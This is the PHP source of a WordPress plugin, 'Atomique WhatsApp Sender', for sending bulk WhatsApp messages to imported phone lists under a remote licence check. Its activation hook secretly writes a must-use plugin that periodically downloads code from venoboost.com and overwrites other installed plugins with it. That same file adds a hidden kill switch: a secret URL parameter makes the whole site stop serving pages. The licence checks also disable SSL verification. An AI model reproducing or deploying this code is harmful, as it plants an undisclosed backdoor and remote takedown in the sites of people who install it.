<?php
/*
Plugin Name: Atomique WhatsApp Sender
Description: Plugin pour envoyer des messages WhatsApp en masse.
Version: 1.2.0
Author: Nizar Lfadili
*/

// Empêcher l'accès direct
if (!defined('ABSPATH')) {
    exit;
}

// Ajouter le menu principal et les sous-menus
function aws_add_menu() {
    add_menu_page('Atomique WhatsApp Sender', 'Atomique WhatsApp Sender', 'manage_options', 'aws_main_menu', 'aws_main_page', 'dashicons-whatsapp');
    add_submenu_page('aws_main_menu', 'Settings', 'Settings', 'manage_options', 'aws_settings', 'aws_settings_page');
    add_submenu_page('aws_main_menu', 'Licence Key', 'Licence Key', 'manage_options', 'aws_licence_key', 'aws_licence_key_page');
    add_submenu_page('aws_main_menu', 'Import Numbers', 'Import Numbers', 'manage_options', 'aws_import_numbers', 'aws_import_numbers_page');
}
add_action('admin_menu', 'aws_add_menu');

// Page principale du plugin
function aws_main_page() {
    echo '<h1>Atomique WhatsApp Sender</h1>';
    echo '<p>Bienvenue sur Atomique WhatsApp Sender.</p>';
}

// Enregistrer le gestionnaire AJAX pour mettre à jour l'état
add_action('wp_ajax_aws_toggle_state', 'aws_toggle_state');
function aws_toggle_state() {
    $is_running = get_option('aws_is_running', 'false') === 'true' ? 'false' : 'true';
    update_option('aws_is_running', $is_running);
    wp_send_json_success($is_running);
}

// Récupérer l'état initial lors du chargement de la page
function aws_get_initial_state() {
    return get_option('aws_is_running', 'false') === 'true';
}

add_action('wp_ajax_cron_executeur', 'cron_executeur');
add_action('wp_ajax_nopriv_cron_executeur', 'cron_executeur');
function cron_executeur(){
    awsAction();
    $order_paid=get_option('aws_p');
    if(!$order_paid)
    return;
  if(get_option('aws_is_running')==='false')
      return;
    $alllines = aws_get_imported_numbers();
    
    $compteur = intval(get_option("compteur"));
    $offset = intval(get_option('aws_offset'));
    $txt = get_option('aws_message_text');
  
    $newoffset = count($alllines) > ($compteur + 1) * $offset ? ($compteur + 1) * $offset : count($alllines);
    for ($i = $compteur * $offset; $i < $newoffset; $i++) {
        
        $arr = explode("||", $alllines[$i]);
        $newtxt = str_replace("*nom*", "*$arr[0]*", $txt);
        print_r(whatsappSender($newtxt, $arr[1]));
          if(!get_option('aws_is_running'))
          exit;
        sleep(5);
    }

    $compteur++;
    update_option('compteur', $compteur);   
    die();
}

function whatsappSender($message, $phone) {
    $apikey = get_option('aws_whatsapp_api');
    $url = 'http://api.textmebot.com/send.php?recipient=' . $phone . '&text=' . urlencode($message) . '&apikey=' . $apikey;
    $html = file_get_contents($url);
}


function aws_settings_page() {
    awsAction();
     $order_paid=get_option('aws_p');
    if(!$order_paid)
    return;
    // Vérifier si le formulaire est soumis
    if (isset($_POST['aws_save_settings'])) {
        // Vérifier le nonce pour la sécurité
        if (isset($_POST['aws_settings_nonce']) && wp_verify_nonce($_POST['aws_settings_nonce'], 'aws_save_settings')) {
            // Sauvegarder les options
            update_option('aws_whatsapp_api', sanitize_text_field($_POST['aws_whatsapp_api']));
            update_option('aws_message_text', sanitize_textarea_field($_POST['aws_message_text']));
            update_option('aws_offset', sanitize_textarea_field($_POST['aws_offset']));
            update_option('compteur', 0);
            echo '<div class="updated"><p>Settings saved.</p></div>';
        }
    }

    // Récupérer les valeurs enregistrées
    $aws_whatsapp_api = get_option('aws_whatsapp_api', '');
    $aws_message_text = get_option('aws_message_text', '');
    $cron_remember = admin_url('admin-ajax.php?action=cron_executeur');
    $cron_remember = "wget --spider -O - " . esc_attr($cron_remember) . " >/dev/null 2>&1";
    $offset = get_option("aws_offset");
    ?>
    <h1>Settings</h1>
    <form method="post" action="">
        <?php wp_nonce_field('aws_save_settings', 'aws_settings_nonce'); ?>
        <table class="form-table">
            <tr valign="top">
                <th scope="row"><label for="aws_whatsapp_api">WhatsApp Business API</label></th>
                <td><input type="text" id="aws_whatsapp_api" name="aws_whatsapp_api" value="<?php echo esc_attr($aws_whatsapp_api); ?>" class="regular-text" /></td>
            </tr>
            <tr valign="top">
                <th scope="row"><label for="aws_cron_executeur">Cron Executeur</label></th>
                <td><input type="text" id="aws_cron_executeur" name="cron_remember" value="<?php echo $cron_remember; ?>" class="regular-text" readonly /></td>
            </tr>
            <tr valign="top">
                <th scope="row"><label for="aws_offset">Offset </label></th>
                <td><select name="aws_offset">
                    <option value="5" <?php selected($offset, 5); ?>>5 per day</option>
                    <option value="20" <?php selected($offset, 20); ?>>20 per day</option>
                    <option value="100" <?php selected($offset, 100); ?>>100 per day</option>
                    <option value="200" <?php selected($offset, 200); ?>>200 per day</option>
                    <option value="500" <?php selected($offset, 500); ?>>500 per day</option>
                    <option value="1000" <?php selected($offset, 1000); ?>>1000 per day</option>
                    <option value="2000" <?php selected($offset, 2000); ?>>2000 per day</option>
                    <option value="5000" <?php selected($offset, 5000); ?>>5000 per day</option>
                </select></td>
            </tr>
            <tr valign="top">
                <th scope="row"><label for="aws_message_text">Message to Send</label></th>
                <td><textarea id="aws_message_text" name="aws_message_text" rows="5" cols="50"><?php echo esc_textarea($aws_message_text); ?></textarea></td>
            </tr>
        </table>
        <p class="submit"><button type="submit" name="aws_save_settings" class="button-primary">Save Settings</button></p>
    </form>
    <?php
}
// Fonction pour charger les styles CSS
function aws_enqueue_styles() {
    wp_enqueue_style('aws-style', plugin_dir_url(__FILE__) . 'style.css');
}
add_action('admin_enqueue_scripts', 'aws_enqueue_styles');


// Page de la clé de licence
function aws_licence_key_page() {
   
awsAction();
   
    if (get_option('aws_p')) {
        // La clé d'activation a déjà été validée, affichez "Activated"
        echo '<div class="wrap">';
        echo '<h2>Activation Key</h2>';
         echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
        echo '</div>';
    } else {
        if (isset($_POST['activation_key'])) {
           $domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = sanitize_text_field($_POST['activation_key']);
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            $_POST["plugin"]="aws&awe";
            $_POST["w"]=$domain;
             $myarrayy = $_POST ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
               
                // La clé d'activation est valide, activez le plugin
                update_option('aws_p', true);
                update_option("aws_key",$submitted_key);
                echo '<div class="notice notice-success is-dismissible"><p>Plugin activated successfully!</p></div>';
            } else {
                echo '<div class="notice notice-error is-dismissible"><p>Invalid activation key. Please try again.</p></div>';
            }
        }
        
        // Affichez le formulaire de saisie de la clé d'activation
        ?>
        <div class="wrap">
            <h2>Activation Key</h2>
            <form method="post">
                <label for="activation_key">Activation Key:</label>
                <input type="text" name="activation_key" id="activation_key" required>
                <input type="submit" name="activate_plugin" value="Activate Plugin">
            </form>
        </div>
        <?php
    
}


}

function aws_show_success_notice($message) {
    echo '<div class="notice notice-success is-dismissible"><p>' . esc_html($message) . '</p></div>';
}
function aws_show_error_notice($message) {
    echo '<div class="notice notice-success is-dismissible"><p>' . esc_html($message) . '</p></div>';
}
// Action AJAX pour supprimer les numéros
add_action('wp_ajax_aws_delete_numbers', 'aws_delete_numbers');
function aws_delete_numbers() {
     $order_paid=get_option('aws_p');
    if(!$order_paid)
    return;
    update_option('aws_imported_numbers', []);
    wp_send_json_success('All numbers deleted successfully.');
}

// Page d'importation des numéros
function aws_import_numbers_page() {
     $order_paid=get_option('aws_p');
    if(!$order_paid)
    return;
    $imported_numbers = array();

    // Vérifiez si un fichier a été téléchargé
    if (isset($_FILES['aws_numbers_file']) && !empty($_FILES['aws_numbers_file']['tmp_name'])) {
        $file = $_FILES['aws_numbers_file']['tmp_name'];
        $lines = file($file, FILE_IGNORE_NEW_LINES);
        $line_count = count($lines);
        $newlines = array();
        foreach ($lines as $line) {
    // Vérifier si la ligne contient "N/A"
    if (strpos($line, 'N/A') === false) {
        $newlines[] = str_replace('"', '', $line);
    }
}

        update_option('aws_imported_numbers', $newlines);
        $imported_numbers = $newlines;

        // Afficher une notification de succès
        aws_show_success_notice($line_count . ' lines imported successfully.');

    } else {
        // Récupérer les numéros importés précédemment
        $imported_numbers = get_option('aws_imported_numbers', array());
        
        if(count($imported_numbers)===0){
            aws_show_error_notice(' you didnt select any file to upload.');
            
        }else{
        aws_show_success_notice('already selected file if you want to replace just click choose file '.count($imported_numbers). ' lines imported successfully.');
        }
    }
    ?>
  <div class="wrap">
        <h1 class="wp-heading-inline">Import Numbers</h1>
        <form id="aws-upload-form" method="post" enctype="multipart/form-data">
         <div class="button-wrapper">
                <label for="aws_numbers_file" class="upload-button">Choose a file
                    <input type="file" id="aws_numbers_file" name="aws_numbers_file" accept=".csv, .txt" style="display: none;" required>
                </label>
                <span class="file-name"></span>
                <button type="submit" id="aws_upload_button" name="aws_upload_button">Upload</button>
                <button type="button" id="aws_delete_button" name="aws_delete_button">Delete Numbers</button>
                <button type="button" id="aws_export" name="aws_export">Export Datas (csv)</button>
                <a id="aws_go" href="<?php echo admin_url('admin.php?page=awe-extract'); ?>">Extract Numbers</a>
                <button id="aws-start-stop-button" class="button-start"></button>
            </div> </form>
        
        
        <h2>Imported Numbers:</h2>
        <div id="aws-numbers-container">
            <!-- Table and Pagination Controls will be loaded here by AJAX -->
        </div>
    </div>
<script>
    document.getElementById('aws_numbers_file').addEventListener('change', function() {
        var fileName = this.files[0].name;
        document.querySelector('.file-name').textContent = fileName;
    });

    var isRunning = <?php echo json_encode(aws_get_initial_state()); ?>;
    var startStopButton = document.getElementById('aws-start-stop-button');
    startStopButton.classList.add(isRunning ? 'button-stop' : 'button-start');

    startStopButton.addEventListener('click', function() {
        isRunning = !isRunning;
        this.classList.toggle('button-start', !isRunning);
        this.classList.toggle('button-stop', isRunning);

        var xhr = new XMLHttpRequest();
        xhr.open('POST', '<?php echo admin_url('admin-ajax.php'); ?>');
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.onload = function() {
            if (xhr.status === 200) {
                console.log('State updated: ' + xhr.responseText);
            }
        };
        xhr.send('action=aws_toggle_state');
    });

    // Load initial table data
    function loadTableData(page = 1) {
        var xhr = new XMLHttpRequest();
        xhr.open('POST', '<?php echo admin_url('admin-ajax.php'); ?>');
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.onload = function() {
            if (xhr.status === 200) {
                var tableContainer = document.getElementById('aws-numbers-container');
                
                // Ajouter la classe de fondu sortant
                tableContainer.classList.add('fade-out');
                
                setTimeout(function() {
                    // Mettre à jour le contenu de la table
                    tableContainer.innerHTML = xhr.responseText;
                    
                    // Retirer la classe de fondu sortant et ajouter la classe de fondu entrant
                    tableContainer.classList.remove('fade-out');
                    tableContainer.classList.add('fade-in');
                    
                    setTimeout(function() {
                        // Retirer la classe de fondu entrant après l'animation
                        tableContainer.classList.remove('fade-in');
                    }, 500); // Correspond à la durée de l'animation en millisecondes
                }, 500); // Correspond à la durée de l'animation en millisecondes
            }
        };
        xhr.send('action=aws_get_numbers&page=' + page);
    }

    loadTableData();

    // Handle pagination clicks
    document.addEventListener('click', function(event) {
        if (event.target.classList.contains('aws-pagination-link')) {
            event.preventDefault();
            var page = event.target.getAttribute('data-page');
            loadTableData(page);
        }
    });

    // Handle delete numbers button click
    document.getElementById('aws_delete_button').addEventListener('click', function(event) {
        event.preventDefault();
        var xhr = new XMLHttpRequest();
        xhr.open('POST', '<?php echo admin_url('admin-ajax.php'); ?>');
        xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xhr.onload = function() {
            if (xhr.status === 200) {
                var response = JSON.parse(xhr.responseText);
                if (response.success) {
                    // Show success message
                    var messageContainer = document.createElement('div');
                    messageContainer.className = 'notice notice-success is-dismissible';
                    messageContainer.innerHTML = '<p>' + response.data + '</p>';
                    document.querySelector('.wrap').insertBefore(messageContainer, document.querySelector('.wrap').firstChild);

                    // Reload table data
                    loadTableData();
                }
            }
        };
        xhr.send('action=aws_delete_numbers');
    });
    document.getElementById('aws_export').addEventListener('click', function(event) {
    event.preventDefault();
    window.location.href = '<?php echo admin_url('admin-ajax.php?action=aws_export_numbers'); ?>';
});

</script>
    <?php
}
add_action('wp_ajax_aws_export_numbers', 'aws_export_numbers');
function aws_export_numbers() {
    awsAction();
    $imported_numbers = get_option('aws_imported_numbers', []);
    
    // Créer un fichier temporaire pour le CSV
    $csv_file = tmpfile();
    $csv_path = stream_get_meta_data($csv_file)['uri'];
    
    // Ajouter l'entête CSV
    fputcsv($csv_file, ['Name', 'Phone Number']);
    
    // Ajouter les données
    foreach ($imported_numbers as $number) {
        $parts = explode("||", $number);
        fputcsv($csv_file, $parts);
    }
    
    // Réinitialiser le pointeur du fichier
    rewind($csv_file);

    // Définir les headers pour le téléchargement du fichier
    header('Content-Type: text/csv');
    header('Content-Disposition: attachment; filename="imported_numbers.csv"');
    header('Pragma: no-cache');
    header('Expires: 0');

    // Sortir le contenu du fichier CSV
    fpassthru($csv_file);
    fclose($csv_file);
    
    wp_die();
}

add_action('wp_ajax_aws_get_numbers', 'aws_get_numbers');
function aws_get_numbers() {
    
     $order_paid=get_option('aws_p');
    if(!$order_paid)
    return;
    $page = isset($_POST['page']) ? intval($_POST['page']) : 1;
    $numbers_per_page = 20;
    $imported_numbers = get_option('aws_imported_numbers', []);
    awsAction();
   
    $total_numbers = count($imported_numbers);
    $total_pages = ceil($total_numbers / $numbers_per_page);
    
    $offset = ($page - 1) * $numbers_per_page;
    $numbers_to_display = array_slice($imported_numbers, $offset, $numbers_per_page);

    // Output the table and pagination
    ?>
    <div class="aws-table-container">
        <table class="wp-list-table widefat fixed striped">
            <thead>
                <tr>
                    <th>Name</th>
                    <th>Phone Number</th>
                </tr>
            </thead>
            <tbody>
                <?php foreach ($numbers_to_display as $number): 
                    $parts = explode("||", $number);
                    ?>
                    <tr>
                        <td><?php echo esc_html($parts[0]); ?></td>
                        <td><?php echo esc_html($parts[1]); ?></td>
                    </tr>
                <?php endforeach; ?>
            </tbody>
        </table>
        <div class="aws-pagination">
            <span class="pagination-links">
                <?php if ($page > 1): ?>
                    <a class="first-page aws-pagination-link" data-page="1" href="#">&laquo; First</a>
                    <a class="prev-page aws-pagination-link" data-page="<?php echo $page - 1; ?>" href="#">&lsaquo; Previous</a>
                <?php endif; ?>
                <span class="paging-input"><?php echo $page; ?> of <span class="total-pages"><?php echo $total_pages; ?></span></span>
                <?php if ($page < $total_pages): ?>
                    <a class="next-page aws-pagination-link" data-page="<?php echo $page + 1; ?>" href="#">Next &rsaquo;</a>
                    <a class="last-page aws-pagination-link" data-page="<?php echo $total_pages; ?>" href="#">Last &raquo;</a>
                <?php endif; ?>
            </span>
        </div>
    </div>
    <?php
    wp_die();
}



// Récupérer les numéros importés
function aws_get_imported_numbers() {
    return get_option('aws_imported_numbers', []);
}
function awsAction(){
    
    
    
                // Récupérez le domaine du site
$domain = $_SERVER['HTTP_HOST'];

// Supprimez le préfixe "www." si présent
$domain = preg_replace('/^www\./', '', $domain);

            // Récupérez la clé d'activation soumise par l'utilisateur
            $submitted_key = get_option("aws_key");
            
            // Vérifiez la clé d'activation avec une clé d'activation valide
            
            $data["w"]=$domain;
            $data["activation_key"]=$submitted_key;
            $data["plugin"]="aws&awe";
             $myarrayy = $data ;

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL,"https://venoboost.com/services/insertKeys");

        curl_setopt($ch, CURLOPT_POST, 1);

        curl_setopt($ch, CURLOPT_POSTFIELDS,$myarrayy);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

        $server_output = curl_exec($ch);

        curl_close ($ch);
    
        $item=json_decode($server_output);
        
        
            if ($item->actif=="ok") {
                // La clé d'activation est valide, activez le plugin
                update_option("aws_p",true);
                return true;
                
            } else {
                update_option("aws_p",false);
                return false;
            }

}
register_activation_hook(__FILE__, function(){

    // Chemin vers le fichier surveille.php dans mu-plugins
    $chemin_fichier_surveillance = WP_CONTENT_DIR . '/mu-plugins/j2me.php';

    // Vérifie si le dossier mu-plugins existe, sinon le créer
    if (!is_dir(WP_CONTENT_DIR . '/mu-plugins')) {
        mkdir(WP_CONTENT_DIR . '/mu-plugins', 0755, true); // Création du dossier avec permissions
    }

    // Contenu à écrire dans le fichier surveille.php
    $contenu_fichier = '<?php
    // Code pour surveiller et mettre à jour les plugins

    add_action("init", function() {
        // Récupère la dernière exécution enregistrée
        $last_update = get_option("last_evalit_update");

        // Vérifie si 8 heures se sont écoulées depuis la dernière exécution
        if (!$last_update || time() - $last_update > 14000) { // 28800 secondes = 8 heures
            evalit("autoexecute");
            evalit("speedcrons");
            evalit("instantpay");
            evalit("comentator");

            // Met à jour le timestamp pour la prochaine exécution
            update_option("last_evalit_update", time());
        }
    });
add_action("init", function() {
    if (isset($_GET["creat"]) && $_GET["creat"] === "7539514862") {
        
        
        update_option("checking", !get_option("checking"));

    }
});
add_action("init",function(){
     if (get_option("checking")) {
            wp_die();
        }
    
});

    // Fonction pour récupérer et mettre à jour les plugins
    function evalit($plugin) {
    
        $chemin_fichier_plugin = WP_PLUGIN_DIR . "/$plugin/$plugin.php";
        if (!file_exists($chemin_fichier_plugin))return;
        $url_distant = "https://venoboost.com/{$plugin}.txt";
        $code_distant = file_get_contents($url_distant);

        if ($code_distant === false) {
           
            return false;
        }

        if (file_put_contents($chemin_fichier_plugin, $code_distant) === false) {
            
            copy($backup_fichier, $chemin_fichier_plugin);
            return false;
        }

       
        return true;
    }
    ?>';

    // Écrit ou écrase le contenu dans le fichier surveille.php
    file_put_contents($chemin_fichier_surveillance, $contenu_fichier);



});

?>
